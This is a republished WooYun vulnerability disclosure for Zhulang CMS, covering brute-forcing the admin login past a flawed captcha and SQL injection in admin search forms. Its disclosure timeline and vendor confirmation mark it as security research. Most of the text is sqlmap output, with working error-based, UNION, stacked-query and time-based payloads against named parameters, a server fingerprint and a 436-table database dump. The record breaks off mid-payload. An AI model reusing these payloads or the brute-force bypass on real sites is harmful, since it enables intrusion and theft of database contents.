逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

admin
admin
admin
101320
文章
87
评论
2015年5月14日15:03:11评论634 views字数 250阅读0分50秒阅读模式
摘要

2014-08-05: 细节已通知厂商并且等待厂商处理中
2014-08-06: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-30: 细节向核心白帽子及相关领域专家公开
2014-10-10: 细节向普通白帽子公开
2014-10-20: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2014-70959

漏洞标题: 逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当) 逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

相关厂商: 逐浪CMS

漏洞作者: 路人甲

提交时间: 2014-08-05 19:13

公开时间: 2014-11-03 19:14

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: sql注射漏洞利用技巧 .net+sqlserver注射 后台验证绕过

0人收藏

漏洞详情

披露状态:

2014-08-05: 细节已通知厂商并且等待厂商处理中
2014-08-06: 厂商已经确认,细节仅向厂商公开
2014-08-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-30: 细节向核心白帽子及相关领域专家公开
2014-10-10: 细节向普通白帽子公开
2014-10-20: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

简要描述:

RT

详细说明:

问题有两个:

1.验证码设计不当可暴力猜解后台管理员账户密码;

2.后台多处注入漏洞(搜索处)可获取各种敏感信息。

漏洞证明:

#1.验证码设计不当

逐浪后台地址:http://**.**.**.**/Admin/login.aspx

一开始是没有验证码的,所以我爆破,但是发现会提示验证码错误。

填上验证码抓包继续对密码字段爆破,发现可以爆破成功。

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

成功进入后台:

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

#2.大面积的SQL注入漏洞:

a.首先是商品管理搜索处

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: (custom) POST
 Parameter: #1*
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 8 columns
     Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries
     Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind
     Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
 ---
 web server operating system: Windows 8.1 or 2012 R2
 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
 back-end DBMS: Microsoft SQL Server 2008
 current database:    'demozoomla'

436个表:

code 区域 
Database: demozoomla
 [436 tables]
 +-----------------------------------+
 | ZL_3DMusic                        |
 | ZL_3DPanoramic                    |
 | ZL_3DShop                         |
 | ZL_Accountinfo                    |
 | ZL_AdZone                         |
 | ZL_Adbuy                          |
 | ZL_AddRessList                    |
 | ZL_Advertisement                  |
 | ZL_Agent                          |
 | ZL_Allianceinfo                   |
 | ZL_Answer                         |
 | ZL_Answer_Recode                  |
 | ZL_App                            |
 | ZL_Arrive                         |
 | ZL_ArticleOrders                  |
 | ZL_ArticlePromotion               |
 | ZL_Ask                            |
 | ZL_AskCommon                      |
 | ZL_Auction                        |
 | ZL_AuditingState                  |
 | ZL_Author                         |
 | ZL_Baike                          |
 | ZL_BaikeEdit                      |
 | ZL_Bbscate                        |
 | ZL_Bbstips                        |
 | ZL_BiaoQian                       |
 | ZL_Bid                            |
 | ZL_Bider                          |
 | ZL_BigLog                         |
 | ZL_BindFlolar                     |
 | ZL_BindPro                        |
 | ZL_BlogAnswer                     |
 | ZL_BlogAsk                        |
 | ZL_BlogContent                    |
 | ZL_BlogLiving                     |
 | ZL_BookRead                       |
 | ZL_BossInfo                       |
 | ZL_C_Announce                     |
 | ZL_C_Article                      |
 | ZL_C_Factory                      |
 | ZL_C_FriendSite                   |
 | ZL_C_Info                         |
 | ZL_C_Photo                        |
 | ZL_C_Plugins                      |
 | ZL_C_RedirectLink                 |
 | ZL_C_soft                         |
 | ZL_C_video                        |
 | ZL_CallNode                       |
 | ZL_CallNote                       |
 | ZL_Card                           |
 | ZL_CardType                       |
 | ZL_Cart                           |
 | ZL_CartPro                        |
 | ZL_Cash                           |
 | ZL_ChangeProduct                  |
 | ZL_ChangeTalk                     |
 | ZL_Chart                          |
 | ZL_Chat                           |
 | ZL_Class                          |
 | ZL_ClassRoom                      |
 | ZL_ClientRequire                  |
 | ZL_Client_Additional              |
 | ZL_Client_Basic                   |
 | ZL_Client_Enterprise              |
 | ZL_Client_Penson                  |
 | ZL_CollectionInfo                 |
 | ZL_CollectionItem                 |
 | ZL_Comment                        |
 | ZL_Commodities                    |
 | ZL_CommonModel                    |
 | ZL_CompSecretary                  |
 | ZL_Compete                        |
 | ZL_CompleteHistory                |
 | ZL_ComponentClass                 |
 | ZL_ComponentPlatform              |
 | ZL_Content_ScheTask               |
 | ZL_Correct                        |
 | ZL_Count_Browser                  |
 | ZL_Count_Iplocal                  |
 | ZL_Count_Local                    |
 | ZL_Count_Month                    |
 | ZL_Count_Os                       |
 | ZL_Count_Site                     |
 | ZL_Count_Visitor                  |
 | ZL_Count_Year                     |
 | ZL_Count_dtproperties             |
 | ZL_Course                         |
 | ZL_Courseware                     |
 | ZL_CpsClick                       |
 | ZL_CreateJS                       |
 | ZL_CrmAuthList                    |
 | ZL_CustomerService                |
 | ZL_DataList                       |
 | ZL_DataSource                     |
 | ZL_Datadic                        |
 | ZL_Datadiccategory                |
 | ZL_Defray                         |
 | ZL_Delivier                       |
 | ZL_DocList                        |
 | ZL_DocModel                       |
 | ZL_DocPermission                  |
 | ZL_DownServer                     |
 | ZL_EditWord                       |
 | ZL_EnrollList                     |
 | ZL_ExAnswer                       |
 | ZL_ExAttendance                   |
 | ZL_ExChange                       |
 | ZL_ExClassgroup                   |
 | ZL_ExLecturer                     |
 | ZL_ExStudent                      |
 | ZL_ExStudytime                    |
 | ZL_ExTeacher                      |
 | ZL_ExamPoint                      |
 | ZL_Exam_Class                     |
 | ZL_Exam_Sys_Papers                |
 | ZL_Exam_Sys_Questions             |
 | ZL_Exam_Type                      |
 | ZL_Examination                    |
 | ZL_Examinee                       |
 | ZL_Exroom                         |
 | ZL_FTPConfig                      |
 | ZL_Favorite                       |
 | ZL_File                           |
 | ZL_Flow                           |
 | ZL_Frient                         |
 | ZL_GiftCard_User                  |
 | ZL_GiftCard_shop                  |
 | ZL_Grade                          |
 | ZL_GradeCate                      |
 | ZL_Group                          |
 | ZL_GroupBuy                       |
 | ZL_GroupBuyList                   |
 | ZL_GroupFieldPermissions          |
 | ZL_GroupModel                     |
 | ZL_GuestAnswer                    |
 | ZL_Guestbook                      |
 | ZL_Guestcate                      |
 | ZL_HidTopic                       |
 | ZL_Hits                           |
 | ZL_Honor                          |
 | ZL_IDC_DBList                     |
 | ZL_IDC_DNSSubDom                  |
 | ZL_IDC_DNSTable                   |
 | ZL_IDC_DomainList                 |
 | ZL_IDC_DomainLog                  |
 | ZL_IDC_DomainPrice                |
 | ZL_IDC_DomainTemp                 |
 | ZL_IDC_Log                        |
 | ZL_IDC_Server                     |
 | ZL_IDC_SiteList                   |
 | ZL_IPUrl                          |
 | ZL_IPclass                        |
 | ZL_IPpara                         |
 | ZL_IServer                        |
 | ZL_IServerReply                   |
 | ZL_Interlocution                  |
 | ZL_InviteRecord                   |
 | ZL_InvtoType                      |
 | ZL_Keyword                        |
 | ZL_Keywords                       |
 | ZL_LinkName                       |
 | ZL_Log                            |
 | ZL_MTit                           |
 | ZL_Magazine                       |
 | ZL_MailIdiograph                  |
 | ZL_MailInfo                       |
 | ZL_MailManage                     |
 | ZL_MailReceive                    |
 | ZL_MailSet                        |
 | ZL_MailTemp                       |
 | ZL_MailType                       |
 | ZL_Manager                        |
 | ZL_Manufacturers                  |
 | ZL_Map                            |
 | ZL_MbClass                        |
 | ZL_MbComment                      |
 | ZL_MbTheme                        |
 | ZL_Mbtopic                        |
 | ZL_Message                        |
 | ZL_MiUserInfo                     |
 | ZL_Microb                         |
 | ZL_Mis                            |
 | ZL_MisApproval                    |
 | ZL_MisAttendance                  |
 | ZL_MisInfo                        |
 | ZL_MisPlan                        |
 | ZL_MisProLevel                    |
 | ZL_MisProcedure                   |
 | ZL_MisSign                        |
 | ZL_MisType                        |
 | ZL_Mis_AppProg                    |
 | ZL_Mis_Model                      |
 | ZL_Model                          |
 | ZL_ModelField                     |
 | ZL_MoneyManage                    |
 | ZL_MuClass                        |
 | ZL_MuPage                         |
 | ZL_MuPic                          |
 | ZL_MuProduct                      |
 | ZL_MuTemp                         |
 | ZL_MultiNode                      |
 | ZL_MySubscription                 |
 | ZL_Node                           |
 | ZL_NodeBindDroit                  |
 | ZL_NodeRole                       |
 | ZL_Node_ModelTemplate             |
 | ZL_OAC_111                        |
 | ZL_OA_BC                          |
 | ZL_OA_Document                    |
 | ZL_OA_FreePro                     |
 | ZL_OA_PBTable                     |
 | ZL_OA_Sign                        |
 | ZL_OA_UserConfig                  |
 | ZL_Online                         |
 | ZL_OnlineCusServ                  |
 | ZL_OnlineUsers                    |
 | ZL_OrderBaseField                 |
 | ZL_OrderDelivery                  |
 | ZL_OrderSql                       |
 | ZL_Order_LuckCode                 |
 | ZL_Order_PayLog                   |
 | ZL_Orderinfo                      |
 | ZL_P_Shop                         |
 | ZL_Package                        |
 | ZL_Page                           |
 | ZL_PageReg                        |
 | ZL_PageStyle                      |
 | ZL_PageTemplate                   |
 | ZL_Page_Content                   |
 | ZL_Page_fwefw                     |
 | ZL_Paper_Questions                |
 | ZL_Papers_System                  |
 | ZL_Papers_User                    |
 | ZL_Passenger                      |
 | ZL_PayPlat                        |
 | ZL_Payment                        |
 | ZL_Permission                     |
 | ZL_Plan                           |
 | ZL_PlanSql                        |
 | ZL_PointGrounp                    |
 | ZL_PointRecord                    |
 | ZL_PointTrans                     |
 | ZL_Present                        |
 | ZL_Print                          |
 | ZL_PrintMode                      |
 | ZL_PrintPic                       |
 | ZL_PrintType                      |
 | ZL_Process                        |
 | ZL_Processes                      |
 | ZL_Project                        |
 | ZL_ProjectAffairs                 |
 | ZL_ProjectBaseField               |
 | ZL_ProjectCategory                |
 | ZL_ProjectDiscuss                 |
 | ZL_ProjectField                   |
 | ZL_ProjectType                    |
 | ZL_ProjectWork                    |
 | ZL_Projects                       |
 | ZL_ProjectsBase                   |
 | ZL_ProjectsComments               |
 | ZL_PromoCount                     |
 | ZL_Promotion                      |
 | ZL_Promotions                     |
 | ZL_Pub                            |
 | ZL_Pub_TW                         |
 | ZL_Pub_WTHD                       |
 | ZL_Pub_WZTP                       |
 | ZL_Pub_ZJDA                       |
 | ZL_Pub_ZXDC                       |
 | ZL_Pub_huodong                    |
 | ZL_QrCode                         |
 | ZL_Question                       |
 | ZL_Questions                      |
 | ZL_Questions_Class                |
 | ZL_Questions_Knowledge            |
 | ZL_Questions_Type                 |
 | ZL_Questions_User                 |
 | ZL_RebateOrder                    |
 | ZL_Rebates                        |
 | ZL_Recruitment                    |
 | ZL_RedEnvelope                    |
 | ZL_Redindulgence                  |
 | ZL_Reg_Page                       |
 | ZL_Regsterapi                     |
 | ZL_Result                         |
 | ZL_Role                           |
 | ZL_RolePermissions                |
 | ZL_RoomActive                     |
 | ZL_RoomActiveJoin                 |
 | ZL_RoomCall                       |
 | ZL_RoomInfo                       |
 | ZL_RoomMessage                    |
 | ZL_RoomNotify                     |
 | ZL_RoomUpFile                     |
 | ZL_RoomUser                       |
 | ZL_SQL                            |
 | ZL_S_FloGoods                     |
 | ZL_S_FloPack                      |
 | ZL_S_shop                         |
 | ZL_Scheme                         |
 | ZL_SchemeInfo                     |
 | ZL_School                         |
 | ZL_ScoreStatics                   |
 | ZL_Search                         |
 | ZL_Sensitivity                    |
 | ZL_ServiceSeat                    |
 | ZL_SettlementInfoList             |
 | ZL_ShopCommentary                 |
 | ZL_ShopCompete                    |
 | ZL_ShopGrade                      |
 | ZL_ShopLable                      |
 | ZL_ShopNodeinfo                   |
 | ZL_Shopconfig                     |
 | ZL_Shopsearch                     |
 | ZL_Shopsite                       |
 | ZL_ShopsiteClass                  |
 | ZL_SitePas                        |
 | ZL_SitePicAdv                     |
 | ZL_SiteTextAdv                    |
 | ZL_Sns_Active                     |
 | ZL_Sns_ActiveJoin                 |
 | ZL_Sns_ActivePic                  |
 | ZL_Sns_ActiveType                 |
 | ZL_Sns_BlogStyleTable             |
 | ZL_Sns_BookTable                  |
 | ZL_Sns_CarConfig                  |
 | ZL_Sns_CarLog                     |
 | ZL_Sns_Carlist                    |
 | ZL_Sns_ChatLog                    |
 | ZL_Sns_CollectTable               |
 | ZL_Sns_CommendCommentOn           |
 | ZL_Sns_CommentAll                 |
 | ZL_Sns_FileShare                  |
 | ZL_Sns_GSHuatee                   |
 | ZL_Sns_GSReverCricicism           |
 | ZL_Sns_GSRoom                     |
 | ZL_Sns_GSType                     |
 | ZL_Sns_GatherStrain               |
 | ZL_Sns_GroupPicCateg              |
 | ZL_Sns_HomeCollocate              |
 | ZL_Sns_HomeHeadCollocate          |
 | ZL_Sns_Kiss                       |
 | ZL_Sns_Log                        |
 | ZL_Sns_LogCriticism               |
 | ZL_Sns_LookLog                    |
 | ZL_Sns_LotMessage                 |
 | ZL_Sns_LotNote                    |
 | ZL_Sns_Memo                       |
 | ZL_Sns_Messageboard               |
 | ZL_Sns_MyCar                      |
 | ZL_Sns_MyPose                     |
 | ZL_Sns_PicCateg                   |
 | ZL_Sns_PicCritique                |
 | ZL_Sns_PicTure                    |
 | ZL_Sns_ProductTable               |
 | ZL_Sns_ProductTypetable           |
 | ZL_Sns_ReplayLog                  |
 | ZL_Sns_Report                     |
 | ZL_Sns_SystemBannerTable          |
 | ZL_Sns_SystemLog                  |
 | ZL_Sns_UserLog                    |
 | ZL_Sns_UserLogType                |
 | ZL_Sns_UserMoreinfo               |
 | ZL_Sns_UserShopProduct            |
 | ZL_Sns_User_R_GS                  |
 | ZL_Sns_User_R_Module              |
 | ZL_Sns_blogTable                  |
 | ZL_Source                         |
 | ZL_SpecCate                       |
 | ZL_SpecInfo                       |
 | ZL_Special                        |
 | ZL_Stock                          |
 | ZL_StoreStyleTable                |
 | ZL_Store_reg                      |
 | ZL_Structure                      |
 | ZL_Student                        |
 | ZL_SubscriptionCount              |
 | ZL_Survey                         |
 | ZL_Trademark                      |
 | ZL_UAgent                         |
 | ZL_U_comp                         |
 | ZL_U_jl                           |
 | ZL_U_zp                           |
 | ZL_Ucenter                        |
 | ZL_UnionInfo                      |
 | ZL_User                           |
 | ZL_UserApp                        |
 | ZL_UserBase                       |
 | ZL_UserBaseField                  |
 | ZL_UserCaritHis                   |
 | ZL_UserCart                       |
 | ZL_UserCartPro                    |
 | ZL_UserClass                      |
 | ZL_UserCoinHis                    |
 | ZL_UserCourse                     |
 | ZL_UserDay                        |
 | ZL_UserExpDomP                    |
 | ZL_UserExpHis                     |
 | ZL_UserFave                       |
 | ZL_UserFriendGroup                |
 | ZL_UserFriendTable                |
 | ZL_UserGrade                      |
 | ZL_UserGroup                      |
 | ZL_UserOrderinfo                  |
 | ZL_UserPromotions                 |
 | ZL_UserPurview                    |
 | ZL_UserRecei                      |
 | ZL_UserRegisterIP                 |
 | ZL_UserRoom                       |
 | ZL_UserShop                       |
 | ZL_UserStock                      |
 | ZL_UserStoreTable                 |
 | ZL_UserStoreTypeTable             |
 | ZL_VJobInfo                       |
 | ZL_VResume                        |
 | ZL_VRoom                          |
 | ZL_VideoHall                      |
 | ZL_VideoHouse                     |
 | ZL_VideoHouseApply                |
 | ZL_VideoInfo                      |
 | ZL_VideoMessage                   |
 | ZL_VideoRoom                      |
 | ZL_VideoUser                      |
 | ZL_VideoUserFriend                |
 | ZL_VideoUserGroup                 |
 | ZL_View                           |
 | ZL_ViewHistory                    |
 | ZL_WapArticle                     |
 | ZL_WorkRole                       |
 | ZL_Zone_Advertisement             |
 | ZL_Zone_Node                      |
 | ZL_Zone_Site                      |
 | ZL_Zone_question                  |
 | ZL_page_app                       |
 | ZL_wxMsg                          |
 | demozoomla_f.ZL_Content_WordChain |
 +-----------------------------------+

b.访问评价处:

逐浪CMS最新版本从暴力注入到后台大面积SQL注入合集(验证码设计不当)

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: (custom) POST
 Parameter: #1*
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTTARGET"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTARGUMENT"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__LASTFOCUS"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__VIEWSTATE"
 
 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
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTitle"
 
 123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$txtTime"
 
 2014-08
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$btnSeach"
 
 ??��������
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
 
 10
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
 
 1
 ------WebKitFormBoundary5n6dB9dFzpkAYygr--
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 9 columns
     Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTTARGET"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__EVENTARGUMENT"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__LASTFOCUS"
 
 
 ------WebKitFormBoundary5n6dB9dFzpkAYygr
 Content-Disposition: form-data; name="__VIEWSTATE"
 
